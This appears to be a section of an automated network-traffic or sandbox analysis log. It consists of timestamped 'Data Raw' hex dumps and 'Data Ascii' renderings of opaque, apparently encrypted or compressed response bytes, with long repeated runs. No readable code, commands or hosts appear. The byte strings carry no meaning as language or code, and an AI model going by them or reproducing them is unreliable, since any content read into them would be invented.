75 bf d0 3a c0 77 4c 92 d2 32 62 06 d9 27 c2 50 55 f3 0a 18 ca d7 a7 a0 e5 38 94 72 4e 38 81 15 dd c5 ff 45 b5 0e
              Data Ascii: c1 Rqd,D R9ua$SDDc`>7@6dX>=7-{je\t_"(mTIT*W|Y*:-VyDKMvJZQ95^~/X|]=n`p0w'-8kNu:wL2b'PU8rN8E
              2022-01-14 10:26:21 UTC1118INData Raw: e8 fe 22 3b 05 28 9a 86 16 3e 10 46 8e 40 3d 03 c3 42 85 07 6f fb ec 5e ea 0e 9d 56 ef f6 98 50 1a 2d 30 2f 50 e5 cc 94 f6 e0 86 84 fd 48 63 df 6a b7 d9 c1 4c bf 50 59 87 aa b7 26 a7 48 1f a7 fd 5c 24 0d 9f 23 23 b8 06 1f 1f 3a ca 48 49 a3 b7 ca 01 c4 d2 72 05 e9 4f e8 e7 26 35 e3 a4 6b f5 3f da 7c 55 de f2 5b 69 35 8d d3 74 48 af 86 8b 39 71 f9 40 fe 77 df ad c9 39 69 19 1e d7 d5 83 51 8b 85 07 15 75 66 0e 92 fe 4c 03 dc f1 24 7d cf 97 66 71 2d 25 5a 2b 7b ad fe 3d cc 72 2f 10 22 81 fe 5f c2 78 28 d1 b8 21 89 22 f7 92 e0 cd 4a 98 06 59 45 da 67 9b e2 eb 3b 82 fb b6 fa ab fc 9d f6 ca 30 a6 8a be 3e cd 73 36 ab 30 45 b8 1b 92 6c 48 3b 21 67 20 10 4f cb 1b 09 7f 11 43 8c 93 92 b5 e0 63 f8 7b d4 e6 f6 d7 21 97 bd fa 2d f1 b0 7c b0 bd 02 98 8f 17 e9 92 66 d1
              Data Ascii: ";(>F@=Bo^VP-0/PHcjLPY&H\$##:HIrO&5k?|U[i5tH9q@w9iQufL$}fq-%Z+{=r/"_x(!"JYEg;0>s60ElH;!g OCc{!-|f
              2022-01-14 10:26:21 UTC1122INData Raw: e2 83 c7 fe b3 f6 07 23 93 a4 32 9a b1 21 b2 e1 7d 18 45 0d fa 24 11 b7 11 65 22 1c 21 29 70 e1 80 b2 f9 9e 68 fd 89 b1 fb 01 d5 d9 d7 91 11 22 aa 42 3b 9e 9f 52 de 62 a6 83 39 10 fd 3b 2c a9 34 ca c0 9a e2 3d 20 d4 5f 8f 4f af 39 5b a4 6c 01 8b 00 aa cc 3a 2f a0 85 db ad 4d 06 ac 5c 6a 12 de 39 38 12 66 8e ed 82 da cc 0a f4 85 80 50 6b cd ba fc 77 85 e0 07 4e 56 9f fd d4 81 0d a4 14 40 63 85 67 3e e7 32 f8 4f 6e 47 fd 77 09 49 a9 ea 70 e0 1b 47 61 e5 d3 6e b8 73 fe 2c 3c 83 68 39 3b 4e ff 5c aa 62 f7 fe 3d 7e 58 de f6 2d 95 19 fa 23 70 79 7b ec 76 46 e1 1f fe 9e 20 c4 26 4e 2b ec e3 f8 94 af 5e cd e8 21 87 e8 57 7d c1 44 81 bd 5b e2 c2 f2 a3 8f 93 8c 78 f8 15 54 2c 8e f3 d5 4a d8 24 cf da 65 f4 50 c8 b2 94 75 22 3d 66 d6 78 53 07 3e 89 5c d0 af 57 8c 9d
              Data Ascii: #2!}E$e"!)ph"B;Rb9;,4= _O9[l:/M\j98fPkwNV@cg>2OnGwIpGans,<h9;N\b=~X-#py{vF &N+^!W}D[xT,J$ePu"=fxS>\W
              2022-01-14 10:26:21 UTC1126INData Raw: f0 21 39 7a b7 35 e9 f2 cb 3f 46 ba 91 88 cb 9c dd 53 69 75 85 31 fa a7 97 ef d6 76 e2 cb 59 05 3c 01 78 8c e4 ab b2 f7 8f 5e 54 05 63 aa eb 27 60 16 ff b8 3c bb f7 5c 1b e7 df 99 5c 60 c4 2f a3 4f 9f b6 88 05 1a 56 f9 d6 cf 94 37 55 a5 16 83 5c d0 cb 13 b8 36 ff c2 8f 8b c9 79 94 3b 7e 1f dd cd bb ac 15 9a 12 f2 4f 1a 0a 03 16 4b 51 5c 99 b8 41 96 21 e4 09 5f 54 b3 42 12 fc 66 83 56 5d 77 b7 40 72 bf 32 b5 c0 16 1f e7 2a e5 6b a2 76 67 9e 11 d6 21 79 aa ca 34 77 19 de a7 08 61 e0 76 d4 b2 e3 59 96 40 4b d6 d3 4a 85 31 74 cd ee ce c7 c4 94 78 ed 16 4a df 5b 07 51 69 9d 76 b7 00 d5 d1 24 f9 03 2a eb 81 01 3b 1b 69 78 26 77 cd 11 9a 15 62 5b 30 3e 0c f2 91 1e b9 51 b8 2e 48 99 c5 c3 89 22 09 f6 e2 a7 e1 7b 81 fa af 8b e3 34 45 c4 48 cb 2f f4 e4 d3 f4 d5 e6
              Data Ascii: !9z5?FSiu1vY<x^Tc'`<\\`/OV7U\6y;~OKQ\A!_TBfV]w@r2*kvg!y4wavY@KJ1txJ[Qiv$*;ix&wb[0>Q.H"{4EH/
              2022-01-14 10:26:21 UTC1130INData Raw: 57 aa b8 c8 07 a2 c8 c3 d4 4d 27 a6 93 9e 37 f0 31 b0 f0 c9 b3 6f d7 6c 95 c8 1f 4b 70 8f 05 d5 3c 55 57 85 b2 12 1d 65 6a e8 78 2c 1e 45 07 74 eb a2 1a d4 ab b3 0a cd 10 2e 02 87 ad 20 55 10 00 52 eb 1b 22 31 4a 85 28 a4 90 21 1f 05 1c ac 52 ba a0 7a ea 71 4c c8 1a 3f a2 36 6a 0b 14 54 cd e6 f7 fb 9d 9a 59 a2 82 a7 6a 39 29 2c 38 5c f9 c7 86 41 60 e1 90 d9 37 e2 8f 07 d8 9f 25 a5 ef 68 77 9b 39 10 5a f9 19 52 44 f1 4f 2c ab 2a 45 38 2f 42 06 20 03 23 fe d1 93 00 a2 22 14 fd d8 14 da c0 26 f8 a9 45 bf 27 f8 08 01 37 a4 ab f3 39 7d e5 95 55 75 f8 5a 09 10 f1 d5 f2 a9 7c 8d e6 5e 70 94 f9 18 2d b0 c4 5a df c6 11 54 aa 1e 45 e4 30 3b 05 8c 59 30 20 89 b9 2e 9a c5 aa 79 c9 40 2f 0a 0c e3 58 4d cc bc 31 6e 19 2f 74 4f 86 fc 61 1f 49 4e d9 55 d2 6b d4 39 4b 5a
              Data Ascii: WM'71olKp<UWejx,Et. UR"1J(!RzqL?6jTYj9),8\A`7%hw9ZRDO,*E8/B #"&E'79}UuZ|^p-ZTE0;Y0 .y@/XM1n/tOaINUk9KZ
              2022-01-14 10:26:21 UTC1133INData Raw: 33 7b 58 3f 86 c4 1f d6 ea 37 e0 25 7e 28 99 43 00 20 76 2b 47 e4 11 15 e3 11 33 79 a2 ec 75 cc 42 5a 17 03 1d d8 4a 40 9c 1d b8 50 db e8 4c 25 86 8d ee f6 5a ab d4 12 8a 2b b1 63 3f bc cf cf 6b 20 a3 50 82 ff 95 82 ad b0 83 13 58 12 54 71 89 28 78 f0 dc 07 7e 6d a6 2d ea 9a 2d 32 0a fe 48 e8 09 3d 70 f7 b7 67 fb 14 62 80 59 92 e3 f8 6d 89 38 cb 9d d3 ab ce 7b 12 d2 8c e9 58 d0 78 30 10 a7 70 cc bf 27 f5 30 e8 87 d0 57 2d 99 fb 45 90 0f fe ce 93 6a 21 5f b2 8d 4e 9d f5 c3 dc 03 dd 2a 6b 87 bc 9e 19 5d c3 e9 5d c2 46 a0 6f 2a 1c ed b7 f7 28 90 ff cc 41 57 d4 3a 3e bc 67 37 ac bc 3f ce 9c 7c e1 e0 79 ba 75 ed b3 44 2c 8f 08 b6 0c 28 b8 d0 c1 69 17 30 3c 09 4f fa a7 cc b3 7b 73 bf 78 7c 38 b7 3b 90 ad 69 e4 89 9e 79 94 71 87 63 88 7a 67 5f da 7a 52 d5 bd 2c
              Data Ascii: 3{X?7%~(C v+G3yuBZJ@PL%Z+c?k PXTq(x~m--2H=pgbYm8{Xx0p'0W-Ej!_N*k]]Fo*(AW:>g7?|yuD,(i0<O{sx|8;iyqczg_zR,
              2022-01-14 10:26:21 UTC1137INData Raw: 91 13 5b f6 b7 4b c9 e5 dc 7d c6 5e 73 de 60 7c 3b 56 1a 96 80 c0 2a 8e e5 a0 8c a1 07 c9 92 9f 73 a7 66 00 29 70 21 73 a0 f6 c1 a9 64 00 2c f1 b9 c7 9c 8a df 92 e3 e2 64 04 4d d7 81 3b 50 27 7a 4d a9 63 8a ae d6 75 dc 70 21 7a 45 c2 50 24 f6 cf 89 2e 84 cd ed cc 19 2d 77 dd e8 55 97 0c b0 aa df e1 e0 18 a2 f1 c4 26 82 cc 68 04 4b bd cd e9 aa d4 7c 39 51 de 18 a4 ed c8 61 84 b6 bf b1 43 47 c7 e7 d0 02 59 ef c5 df eb c4 22 f4 c2 50 2e f0 47 b6 c9 e0 63 f4 bf b2 cd 97 7d c6 21 02 5b f3 4a 33 62 04 42 c3 aa d3 8f 6d eb b1 47 b9 b7 3c d0 0a 3a da 00 5a 6f 96 f4 bc 41 40 ca 1a 96 f4 c0 52 5d 85 32 ea 29 2d 1b 71 b1 16 fc c4 49 e6 37 51 ab 3a bf d6 17 35 09 a8 8e cd 8b 2b 77 99 68 21 61 9b 15 72 0b 54 7a 21 68 26 df b1 14 f4 e2 3c 8f 40 9a ed a6 84 ea 0a 2c 9a
              Data Ascii: [K}^s`|;V*sf)p!sd,dM;P'zMcup!zEP$.-wU&hK|9QaCGY"P.Gc}![J3bBmG<:ZoA@R]2)-qI7Q:5+wh!arTz!h&<@,
              2022-01-14 10:26:21 UTC1141INData Raw: 32 ba 37 05 c0 4d a1 18 ae a5 66 75 d8 6c 64 66 7a 6b e6 73 d5 af 58 23 06 76 5f 46 31 a2 fc 79 c6 f7 39 82 b5 a7 6b 0c b0 39 54 ed c6 d4 0f cc 19 a4 e1 69 e2 fb 21 a3 63 43 4e 62 73 8a ab 03 dc 18 af 3a da 0d 36 e4 53 b0 df db ff 15 27 cf 83 d1 87 a9 6f 72 55 06 44 83 3a 75 db 55 94 2b 77 91 19 7c 4a 5d b6 fb 10 b3 74 69 d0 34 e4 94 90 85 31 4a 34 df eb 14 aa 37 5f 68 70 dd ef 51 a5 7f 3f 6b eb f5 3b 84 b1 0f 34 bc 35 12 b2 c2 2e d8 7f 40 cc 16 a1 75 d2 0c bb b7 44 d3 82 ae d0 11 34 fa a8 c1 aa f9 36 ca 1e bb bf 82 be 05 ca 22 8a 98 80 7e 47 7c 42 0f 31 a5 6d 34 ed 1b 15 c1 a5 90 90 67 fa 2c ff a5 63 76 5b 00 5e 95 04 d9 fe 3f 45 21 07 6a 64 dc 79 61 88 04 46 8e 94 26 8a 1c 90 27 08 04 46 7a 40 80 b5 09 cd fb 25 25 0c 80 b6 44 cb 3d 5a 76 58 68 7b d1 82
              Data Ascii: 27MfuldfzksX#v_F1y9k9Ti!cCNbs:6S'orUD:uU+w|J]ti41J47_hpQ?k;45.@uD46"~G|B1m4g,cv[^?E!jdyaF&'Fz@%%D=ZvXh{
              2022-01-14 10:26:21 UTC1146INData Raw: 15 24 bd b8 fd 29 b8 ce c2 24 5d 87 f1 cc f1 cc f9 3e 3b 5b 73 d7 7e 4e a6 e6 cf 83 a8 ed 6e 6a c0 20 24 86 12 be 76 5c 41 49 e3 ef 9b 0e cf 83 4e 25 7a 47 b9 b0 d5 8e 96 85 3e c0 3d 5e 10 ba 24 86 94 9e c5 ac 14 a4 0a 4e c1 a3 80 b3 f4 b4 9b 0f 69 e0 0c b2 a2 fe d6 72 2c f9 4b be 4c 20 92 9b 07 c7 8c ae e5 d3 bb 86 90 a7 71 e2 5c 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 bb ea 0f 60 78 02 0d 56 26 bc 08 79 c6 2d 22 c3 f6 fb 72 16 98 dd bf e6 09 9d 25 75 98 f1 89 72 0a 37 61 be 0c ee 05 86 90 d2 50 77 a6 a3 3f 12 e6 17 7b ae e9 ec 72 64 37 00 0d 68 0d 70 0e e6 0c f0 1a f7 0b 00 68 37
              Data Ascii: $)$]>;[s~Nnj $v\AIN%zG>=^$Nir,KL q\#5]$}2B)B)B)B)B)B)B)B)B)B)B)B)B)B`xV&y-"r%ur7aPw?{rd7hph7
              2022-01-14 10:26:21 UTC1150INData Raw: 19 1f 2c c9 a5 55 a4 d3 bb 86 90 a6 d7 c4 1a a1 4c 10 8b 1b 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29
              Data Ascii: ,UL#5]$}2B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)
              2022-01-14 10:26:21 UTC1154INData Raw: 69 0a a7 a6 0d d2 ed 0b d9 10 5c cc f1 27 e4 9e 18 40 2b b8 1e 4b 6f 22 6e 86 72 9b e4 ba e6 9a 69 04 90 59 6a 95 eb 0f bc bd 5b 4e b6 59 68 b1 fc 1a 19 e0 27 41 c8 dc 36 a6 7c 85 7f 70 c4 e5 84 e8 f2 7f 7a 00 c9 5a f7 dd 05 0c 63 22 52 e2 81 d8 9b 59 d6 39 1d 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 2d 4b 8e a2 d3 bb 86 90 2d 19 4d c3 7e ec e1 4b 76 d8 f2 30 2c 72 a7 9e 3a 53 50 c5 63 19 c7 76 92 4d 4f 40 0a 9b e0 83 f5 e3 3f ad 98 5e dc ae 16 70 87 f6 77 02 80 69 2f be e2 b0 12 7e 8e 4d 6d 2a 36 2d b4 01 1d dd 2e 27 d4 d2 c6 c2 c9 42 05 34 1c 7c 85 bb 32 1b dc fd af a1 b3 9f a3 bb 79 0b ff e3 21 d9 20 46 61 3f f2 01 ea 91 d6 bd 8a 99 3a e8 69 d0 34 db cd ae e9 ec 72 64 45 80 8b 1b 23 35 71 e2 5c 33 3d 6f dd d1 27 3e f1 fd a4 c5 89 0b
              Data Ascii: i\'@+Ko"nriYj[NYh'A6|pzZc"RY9)B)B)B)B)B-K-M~Kv0,r:SPcvMO@?^pwi/~Mm*6-.'B4|2y! Fa?:i4rdE#5q\3=o'>
              2022-01-14 10:26:21 UTC1158INData Raw: 26 43 83 fc 60 c3 68 be fc 69 2f 81 d4 e3 59 c7 ca 4d 54 77 ba 51 64 fa 53 74 97 f0 b7 82 78 b5 b4 09 04 b1 bc f7 f4 3a 24 48 f8 36 13 ed 0b b9 4d 6d 26 0a b2 0d fb a0 06 8a 66 f8 41 87 ec dc 83 f5 f9 a4 1f d3 44 57 64 ba fb b4 3a 17 e5 47 49 76 92 0a b2 0d fb 8d ec 8d df 49 45 7f fe 03 22 4c ef 6c 9c 3e 0e 03 2b b8 00 1d e8 96 4b e0 ef 0b c6 8c 0c 10 c1 11 8f a6 55 30 46 97 36 df d5 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 45 80 83 0a 4a 0b 00 68 c0 11 0d 04 99 4b ff 6d 26 4e e6 97 c9 5a d0 cb 56 d9 37 9e 3a 13 e9 13 ed 01 1f d3 44 0e 77 10 74 81 ec 8d df 31 b0 12 63 62 e0 f2 63 b0 9e b6 04 b6 37 9e 3a 2c 05 0c 7d 3d a3 ae 16 26 70 9f b7 c6 d2 c6 e1 63 0f f6 77 59 61 41 87 a0 06 8a 66 f8 41 87 ec dc 83 f5 f9
              Data Ascii: &C`hi/YMTwQdStx:$H6Mm&fADWd:GIvIE"Ll>+KU0F6$}2B)B)B)B)EJhKm&NZV7:Dwt1cbc7:,}=&pcwYaAfA
              2022-01-14 10:26:21 UTC1162INData Raw: 51 64 ba fe 65 38 1b dc b0 12 70 9f b7 82 78 8e 5d 49 76 92 54 dd 2e 32 29 bd 75 14 6b 2a 3a 17 e5 1c 59 52 e2 a3 e7 51 49 76 14 f5 7d 03 31 3d 4c ef 00 f4 b8 00 97 9d 06 8a 66 ef b9 7e 80 21 0d fb fd b0 b3 8b c7 0f 88 6a f0 aa 1f d3 19 ce cf 4d 30 03 11 f2 55 45 6c a8 71 31 b8 00 52 b0 14 6b 18 7d 11 f2 6b 3e 1a 5e 8d 95 87 5b de 3c 83 0a 81 fa 6e 5b b1 70 60 1e aa e0 58 55 a4 d3 bb 79 92 cd 37 9e 7f bb 73 19 a5 ef 06 8a 2c 7c 85 f1 4d 22 4c ef 53 35 a2 31 f0 df 2a 3a 76 f3 fd e7 7e e6 9a 42 3a 55 5b 4e eb 1e 55 5b 4e f7 f4 7b 17 ca d8 b9 66 8f db 32 23 fc 69 2f af b2 0d fb ec 95 cd 51 64 b8 00 97 c9 5a d0 cb 56 d9 37 9e 3a 17 e5 1c 59 52 e2 a3 a8 25 c5 63 2a 2c 36 20 7c a8 23 ca e1 1c 5f 45 e6 03 77 10 59 c0 21 ce c9 32 e1 25 c5 2c 83 f5 f9 a4 96 4b 71
              Data Ascii: Qde8px]IvT.2)uk*:YRQIv}1=Lf~!jM0UElq1Rk}k>^[<n[p`XUy7s,|M"LS51*:v~B:U[NU[N{f2#i/QdZV7:YR%c*,6 |#_EwY!2%,Kq
              2022-01-14 10:26:21 UTC1165INData Raw: 4c 8d bd 17 e5 58 91 92 54 f4 52 cb 56 87 b2 53 d7 a4 b3 14 94 50 e6 9a bd 8a 99 3a e8 69 d0 34 db cd ae e9 ec 72 64 45 84 8c 9e c5 80 83 0a 7e 29 42 fa 91 b1 70 60 3c 3f 5d 98 fe 65 a1 2a 5c cc 98 0b cc d4 c6 e5 1c 59 43 92 54 dd 39 8e 5d 49 6a b1 8f db 10 56 d9 37 b9 59 52 e2 8e 70 9f b7 b6 30 2d b4 31 93 d2 c6 de 93 d2 c6 a4 69 2f af de e6 9a 42 51 30 2b b8 80 fc 2a 3a 8e c4 8c 61 3d cf 74 97 a9 90 59 52 84 40 0a 81 9c 0d fb ec a2 29 bd 75 1a 59 52 e2 ad 9f b7 82 76 95 cd 51 6a aa 1f d3 4a f3 fd e7 16 60 c3 68 bf 77 10 74 99 c2 ea 91 d8 be f3 fd f9 eb 18 62 8b d1 7c 85 c5 57 63 3c 3f a0 19 e0 9f 8f e3 2d 36 a2 b3 5d e5 b0 be 0c 7d 03 11 0d 04 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 64 45 80 83 16 98 b8 ff 48 07 f7 0b 92 ab 62 41 b8 e5 f9
              Data Ascii: LXTRVSP:i4rdE~)Bp`<?]e*\YCT9]IjV7YRp0-1i/BQ0+*:a=tYR@)uYRvQjJ`hwtb|Wc<?-6]}p`<rdE~n[pdEHbA
              2022-01-14 10:26:21 UTC1169INData Raw: 87 da b9 81 98 75 14 94 35 90 59 ad ba e7 0d 04 90 49 76 6d e4 e1 12 8f 9e 00 ba 04 d5 72 9b 3f eb 33 af 6b 8f ae 2f 50 fc 7e 93 2d e0 96 4b 8e 73 3e 13 12 1a 17 fc 96 51 72 94 af c5 5c d2 39 e4 ff cf b2 10 6e b0 ed 18 72 91 29 f6 45 7f 01 83 8f 99 3a 97 bd 2d 4b f5 97 f2 80 74 91 d6 42 49 4b 65 c7 1b ee 88 95 a5 fd c3 97 99 8d f5 06 cf 77 1f 2c 7e ba fc 96 31 c5 22 b3 82 70 9b 3f c4 db 3e f1 3f b8 02 6c c1 0f cd ae 7c e6 ab 62 34 a7 e8 69 67 76 b8 ff d5 71 1d 28 b1 06 c7 a0 04 a0 3b 6a 86 46 fb 13 d0 f0 88 95 b4 7c a8 dc 86 5a d9 c8 e9 27 c1 93 ee b3 8b 1b b6 6d 13 12 5e e9 3e f1 20 73 38 e4 9d bf 72 64 b8 02 93 2d 09 b9 c2 15 d8 88 44 fe 62 b9 7a 76 05 9b 55 a4 02 bd 5f ba 84 0c 01 ea b7 a4 0c 82 6d 33 a9 5e c1 6a ad 67 bf fc e1 da 81 ce e3 de 8c 41 90
              Data Ascii: u5YIvmr?3k/P~-Ks>Qr\9nr)E:-KtBIKew,~1"p?>?l|b4igvq(;jF|Z'm^> s8rd-DbzvU_m3^jgA
              2022-01-14 10:26:21 UTC1173INData Raw: 89 e8 69 49 10 74 68 f5 bc fc 96 c4 75 73 e6 d3 08 86 90 40 11 f2 80 3a 5b 4e 14 46 cf 4f 97 85 a7 a6 d7 01 56 d9 c8 ed 31 ab 62 c9 22 3f 73 13 d9 37 61 43 a2 31 54 dd 2c 36 df 2a 3f 8c 9e 3a 18 62 41 78 71 e2 5c b1 16 e2 5c 33 59 ad 67 cc 2b 47 85 0e 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 4a 0b 01 ea 6e 5b d1 b6 fb 13 22 b3 74 68 66 39 e9 e3 de ac 6d d6 42 75 63 cc 2b b8 00 67 cc 5b 4e 1b 23 ca d8 46 03 11 f2 80 83 7d 8b 1b 23 45 9f 48 07 08 4a 0b 00 b7 80 83 0a 7e 7f 01 1a d1 a9 5e c8 dc fc 96 44 21 ea 6e ab 72 74 68 be 1d 39 e6 ed 7c f2 08 f1 ec 63 83 4e 50 5d f2 04 61 af 2b 03 aa a4 97 b2 e3 cf c2 62 36 48 70 e7 f6 99 4a f4 7b 67 33 d6 c2 9d cb 21 a9 a7 c0 9e 85 4a 4f d3 ff 88 6c d8 06 31 10 cf f6 1c 39 e9 9c b6 8c e9 9b b8 00 e7 97 c9 5a d0 cb
              Data Ascii: iIthus@:[NFOV1b"?s7aC1T,6*?:bAxq\\3Yg+G$}2Jn["thf9mBuc+g[N#F}#EHJ~^D!nrth9|cNP]a+b6HpJ{g3!JOl19Z
              2022-01-14 10:26:21 UTC1178INData Raw: 2b 47 85 0e 87 13 12 87 bb 86 91 38 a4 d3 bb 86 90 a6 d7 c4 1a a1 4c 1e 02 6c 56 24 2f 50 19 1f 2c c9 a5 55 a4 d3 bb 87 3b 6a 53 9e b5 78 71 e2 5c 33 59 ad 67 cc 2b 45 68 4e 14 6a da 4a 0b 00 68 4e 14 94 af 6b d5 b9 e9 ec 72 9c e1 da 4a 0b 00 68 4e 14 94 af 6b d5 6f dd d0 6a c2 15 16 9a 55 a4 d3 bf 86 90 a7 59 ad 67 cc 2b 47 85 0e 87 13 12 8f 24 b7 7d fc 94 77 ef f9 0b 09 fb 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 3d 6f dd d5 b6 fb 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 4d 92 ab 66 40 f5 07 f7 0b 00 68 4e 14 94 af 6b d5 bf 8f 24 b7 7d fc 94 07 f7 0b 04 79 f4 85 0e 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 40 6d d9 c8 27 37 61 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 7d fc 96 b0 e4 61 bf 8f 24 b7 7d fc 96 b4 f6
              Data Ascii: +G8LlV$/P,U;jSxq\3Yg+EhNjJhNkrJhNkojUYg+G$}w$}2B)@=o$}2B)@Mf@hNk$}y$}2@m'7a$}2B)@}a$}
              2022-01-14 10:26:21 UTC1180INData Raw: 53 4b 8e a2 7c b2 f2 80 a2 02 6c 57 89 a3 51 9b 8d e8 69 d0 15 ba 04 70 41 ec 72 64 f7 c3 97 36 fe 14 94 af 4a 6b d5 bf 3c f8 8d 20 8f 73 e6 65 e7 4f 97 36 6c 43 7c 7a 56 87 13 12 90 56 26 bc bb 8a 99 3a f7 e1 da 4a 14 38 e4 61 0c 7a 76 6d c6 bb 86 90 b8 5f ba 04 c2 f9 0f 09 e5 7b f8 8d 3e f5 06 75 59 7d fc 96 a9 a5 55 a4 c8 73 e6 65 75 67 cc 2b 5c 74 68 4e 0f 25 3a e8 db 05 f3 02 77 c9 a5 55 be dc 4f 97 84 4c 10 8b 01 23 35 5d ac 95 32 d6 f0 cb a9 5e 22 da 4a 0b 1a b1 70 60 8e 2e cd ae f0 97 36 df cc 9b 3f 73 54 b6 fb 13 0b a7 59 ad 7f 81 05 f3 b0 61 be 0c 9a c5 9c c1 8b 4f 97 36 6d b5 78 71 f5 da 4a 0b 15 6a 52 1d 9a dd d1 b6 ee 01 ea 6e 4f 6f dd d1 04 20 ae e9 f8 62 41 78 65 bf 8f 24 05 7f 01 ea 7c ab 62 41 6a 72 64 45 32 5a 2f 50 08 0f 09 fb 02 3c ec
              Data Ascii: SK|lWQipArd6Jk< seO6lC|zVV&:J8azvm_{>uY}Useug+\thN%:wUOL#5]2^"Jp`.6?sTYaO6mxqJjRnOo bAxe$|bAjrdE2Z/P<
              2022-01-14 10:26:21 UTC1184INData Raw: 63 c3 94 a6 d6 42 fa 90 c6 1e aa 7b d0 34 db 9d 45 e0 5f ca 2f 90 ac 35 51 7b f6 78 61 be 22 b2 ee 77 d6 76 71 e2 57 82 9e c5 9c b1 7b f8 91 28 d2 39 78 45 92 ab 7d 98 aa e0 5f a8 dd a1 5c d3 a9 ae fd 4a 13 12 85 3a f0 7b f3 56 3e f1 f1 99 22 b3 7e 67 cd de 47 d7 dc 4f 9f 7c 62 41 71 86 88 95 34 c3 96 c4 1c f4 8e a2 c6 2a cf b2 f6 82 86 90 a6 d7 94 af 6b 4e 3c bc 0e 35 50 19 10 bf 82 87 17 01 f3 02 6c 46 93 2d 4b 15 3e f1 fd 48 01 8a 9e b5 70 a0 c0 c1 9f a8 d2 c9 b5 7a 42 fb 36 dd ec 46 26 bc 03 d8 5f ba 04 70 f0 7b f8 16 b0 bd 88 a5 56 46 07 87 16 98 ad 66 58 2a c3 88 8c 9e c5 cc 3b aa f2 50 0d e4 77 1f 34 db d9 c9 86 90 bd be 2f 50 05 97 15 16 85 7a 55 a4 de 70 61 ee 7c 1a ad 17 17 da 45 50 08 99 29 b2 e7 35 41 78 66 7d e0 58 20 b2 f3 72 74 a8 ce e0 4c
              Data Ascii: cB{4E_/5Q{xa"wvqW{(9xE}_\J:{V>"~gGO|bAq4*kN<5PlF-K>HpzB6F&_p{VFfX*;Pw4/PzUpa|EP)5Axf}X rtL
              2022-01-14 10:26:21 UTC1200INData Raw: a3 62 04 7c 0e 47 00 20 ae e9 8d 97 33 d2 71 ee 02 ac 60 74 68 4e 75 98 bd 01 a2 c6 4e 50 16 98 ac 9d c0 0e 6d 63 cc 23 65 4c 70 44 ba 8f 6c 6f 36 df d5 93 5d a3 ae e9 ec 11 33 54 af 23 35 5d 98 bd 9f b7 7d fc f5 6d d4 b0 a5 55 a4 d3 d1 a3 dc 07 08 b1 f3 4b 96 c0 d1 33 11 0d 04 12 d5 ba 8f 6c 5b c4 da cf fa 91 29 23 cb ac 6e 13 12 8f 24 d4 a8 f9 8c d6 7a 03 ee 77 ef 9a 22 8e 21 79 f4 84 a0 e5 f6 77 ef f9 6c da 47 08 31 54 22 b3 e2 d8 49 89 17 1a c2 87 2e 4d 92 ab 62 e2 d9 c7 a0 da 31 d7 c4 1a 8f 4f 82 78 be 87 da 79 b1 7b 8c 5e bd c2 15 16 fa f2 85 85 46 0f 7c ba 81 4d 9a ee fc 96 b4 94 8d 25 b1 38 c2 61 7e fa d4 39 25 b1 34 24 48 ff d6 aa 37 ea 6e 5b d2 e0 55 29 0a b8 74 24 a6 a3 51 a0 49 e9 c8 7f 8a d1 b6 fb 3d da 5f 45 41 f3 47 8c e9 dd 29 c1 d2 a5 17
              Data Ascii: b|G 3q`thNuNPmc#eLpDlo6]3T#5]}mUK3l[)#n$zw"!ywlG1T"I.Mb1Oxy{^F|M%8a~9%4$H7n[U)t$QI=_EAG)
              2022-01-14 10:26:21 UTC1212INData Raw: 82 8b da c9 e4 61 ae e6 24 45 9c b6 fb 13 02 6c 6a 1a ad a7 da 02 ad ec 33 ba 71 28 fb 5b bd 4b 0d 4c 10 8b 1b 92 2f 5f be 4d ab 04 74 28 77 e0 19 10 fe 83 33 1d 78 55 e8 e4 29 5a a4 96 91 5d 74 53 d7 94 8b 5f 37 29 c8 37 ec 3a a8 d0 b9 c9 67 47 c4 73 0d 84 90 2b 0e d5 bb 0b 48 04 9a 7c 32 37 96 fc 95 d8 87 5a e7 cc 62 01 ce 7c f3 46 d1 3d 23 f0 f0 32 de 1d a3 18 7c 8d 68 87 98 f9 c0 54 2d 0e 4e 2f 1c a4 32 17 52 4f 9b b2 ba 07 1d e9 a4 16 13 5b 50 ee 3e f7 80 ce f5 8d 69 90 82 cb 22 f7 0b 00 68 ab e7 e8 a9 db 35 d6 bd 75 02 fc 7e 5f 9e 81 8c d6 42 fa f2 d2 34 56 6e 0b 24 f3 8f 6c 13 36 93 a0 86 b8 db 89 9e 8d 20 ae f9 0f 49 ad 23 f2 c0 35 19 92 e3 74 